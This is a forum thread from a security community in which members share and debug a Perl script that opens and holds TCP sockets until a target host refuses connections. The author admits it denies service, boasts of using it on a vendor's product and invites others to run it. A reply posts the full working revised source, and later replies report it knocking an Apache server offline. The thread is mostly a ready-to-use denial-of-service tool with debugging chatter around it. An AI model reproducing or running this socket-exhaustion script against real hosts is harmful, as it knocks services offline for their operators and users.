Test my socket script
Results 1 to 7 of 7

Thread: Test my socket script

  1. #1
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883

    Test my socket script

    Here is a script that opens sockets to any box you specify and holds them until you release the connections. The purpose of this script is to see how many sockets a box will allow before refusing connections.

    I just used this to pound a very well known product developed by a major player in the industry. The guilty will remain anonymous.

    Anyway, I'd like it to get some play on this script so go ahead and run it. Keep in mind, it will DoS a box when it hits the connection limit so *DON'T* use this on production machines unless you want to have you admin all over your ass.

    The script is written in PERL and the syntax can be found in the script. You must read the agreement first, then you'll see the syntax at the bottom.

    Any feedback is appreciated.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  2. #2
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Is this a "pull my finger" kind of thing??

    Gonna try it on FreeBSD and get back to you on it..
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Yeah, I should mention that I have tested this on:
    RH7.1 - RH9.0
    Slackware 9

    Umm, that's about it so far.

    For those who I spoke to on irc.unerror.com yesterday, yes, this is the script I used on the product I ranted about.


    UPDATE:

    Bug #1 - If you specify a number of sockets that is greater than the number the remote host can handle, the script will terminate, leaving the sockets connected for the time out period on the remote host. Normally, you'll get a prompt telling you to press enter to release the sockets if you specify a number of sockets that a box can handle. This will be fixed shortly. Stay tuned for rev 1.1.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #4
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Sun Microsystems sun4u Sun Fire 280R (2 X UltraSPARC-III+) running Solaris 9, perl
    This is perl, v5.8.0 built for sun4-solaris


    Error 1, no input (usage):
    The command line args are:
    socketfill.pl IP.ADDRESS.OF.HOST PORT SOCKETS
    ie. - socketfill.pl webseal.ibm.com 443 301
    Died at ./socket.pl line 39.
    Might be more appropriate to issue an exit 0 (for no errors) rather than a die.

    Bug 2:
    /socket.pl <snip>22 300
    Opening socket 0
    Opening socket 1
    Opening socket 2
    Opening socket 3
    Opening socket 4
    Opening socket 5
    <snip>
    Opening socket 250
    Opening socket 251
    Opening socket 252
    Could not open remote socket: 253
    Can't call method "autoflush" on an undefined value at ./socket.pl line 65.

    Bug #1: Paused after socket 10, never paused again.
    Bug #2, died on can't open remote socket, doesn't appear to properly close the socket, you may wish to issue a close for the socket instead of the autoflush. I don't remember what the issue was with the autoflush, but I remember having problems with it when I wrote my spam relay detection thing.

    You might want to consider testing whether the system is up, if it is not, you might want to break out of the while loop with a last. You might even want to check to see if the socket failed to establish the connection and if so, then back off...

    Dunno, kinda wondering what you took out of the script now

    /nebulus


    EDIT: Also noticed you do no checking on your inputs...just a pet peeve of mine You might want to look into the getopts module.

    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  5. #5
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    I got momentarily curious and played around:

    Code:
    #!/usr/bin/perl
    use Getopt::Std;
    
    # Sockets - How many sockets to open in the socket attack
    # 301 is the limit for WebSEAL since the connections start at count 0
    
    # sleeptime - amount of time in seconds to pause between tests;
    # this gives the server time to catch up instead of flooding it.
    # script will sleep after opening and before closing socket
    $sleeptime = 1;
    
    #Don't touch this line
    $dietoggle = 1;
    
    # End setting options
    ################################################################
    
    ## Main program ##
    
    # Print the usage screen if insufficient commandline arguments are 
    # presented
    $ARGC=@ARGV;
    if (! $ARGC )  { 
            print("The command line args are:\n");
            print("socketfill.pl [options]\n");
            print "-s               sleep time between multiple sockets\n";
            print "-n               number of sockets to open\n";
            print "-p               use this port on 'host'\n";
            print "-h               host\n";
            exit 0;
            }
    else
    {
            %args = ();
            getopts("s:n:p:h:", \%args);
            $args{s} = 1 unless defined $args{s};
            $args{n} = 100 unless defined $args{n};
            $args{p} = 443 unless defined $args{p};
            $args{h} = "127.0.0.1" unless defined $args{h};
            $sleeptime = $args{s};
            $socket_attack_num = $args{n};
            $remoteport = $args{p};
            $remotehost=$args{h};
    }
    
    # Begin the main app
    &sockattack;
    
    #########################
    ### Begin Subroutines ###
    #########################
    
    sub sockattack {
       use IO::Socket;
    
            $socket[0] = IO::Socket::INET->new(PeerAddr => $remotehost, PeerPort => $remoteport, Proto => "tcp", Type => SOCK_STREAM);
            if(! $socket[0] )
            {
                    print "Couldn't establish connection to $remotehost on port $remoteport, ( $! ) aborting.\n";
                    exit 1;                        # kill program, we have errors
            }
            else
            {
                    $counter = 1;
            while ($counter < $socket_attack_num)   
            {
                    $socket[$counter] = IO::Socket::INET->new
                    (
                            PeerAddr => $remotehost,
                            PeerPort => $remoteport,
                            Proto => "tcp",
                            Type => SOCK_STREAM
                    );
                   
                    if(! $socket[$counter] )
                    {
                            print "Socket connection $counter ($! ) aborted...sleeping\n";
                            sleep 3*$sleeptime;     
                            next;
                    }
                    $socket[$counter]->autoflush(1);
    
          printf("Opening socket $counter\n");
          if($counter % 10 == 0) { sleep $sleeptime; };
    #      sleep $sleeptime;
    
       }
       print("Press enter to release sockets:\n");
       $input = <STDIN>;
       foreach $s (@socket)
       {
            close ($s);
       }
       return 1;
       }
    }
    Now it behaves nicely:
    Opening socket 252
    Socket connection 253 (Too many open files ) aborted...sleeping
    Socket connection 253 (Too many open files ) aborted...sleeping


    :) :)

    /nebulus

    EDIT: Forgot to actually exit with a found execption :)


    Regardless:

    1) Now it checks to make sure it can make the first connection be making more, and if it fails, it tells you why.
    2) Defaults to a scan of localhost on 443 if you enter no options
    3) Scans options with getopts to show you what I meant...still no sanity checking of input though...got interrupted and had to quit playing with it
    4) Will attempt to sleep and wait to make more connections if it can' treach your maximum that you specify. I could have made it better, but it was only meant to be an illustration of what I meant.
    5) It doesn't bark about autoflush now and it closes all of the sockets.
    6) There is still the bug with counter off by 1, didn't get a chance to correct that.

    Anyways, would be curious to know what you think about the changes.

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  6. #6
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    Thanks for the input. Perhaps further "curiousity" by all of us will result in a nice little tool for all of us. I will add the changes and suggestions, giving those who offered them up credit in the header.

    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  7. #7
    Super Moderator
    Know-it-All Master Beaver

    Join Date
    Jan 2003
    Posts
    3,914
    Hey Hey,

    Very Nice software. I tested it against my apache server and couldn't establish a connection to the server from another source. Just to let ya know if you are keeping track of what is runs nicely on... This is a Windows XP Box and I used cygwin with perl, v5.8.0 built for cygwin-multi-64int.
    IT Blog: .:Computer Defense:.
    PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch".

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides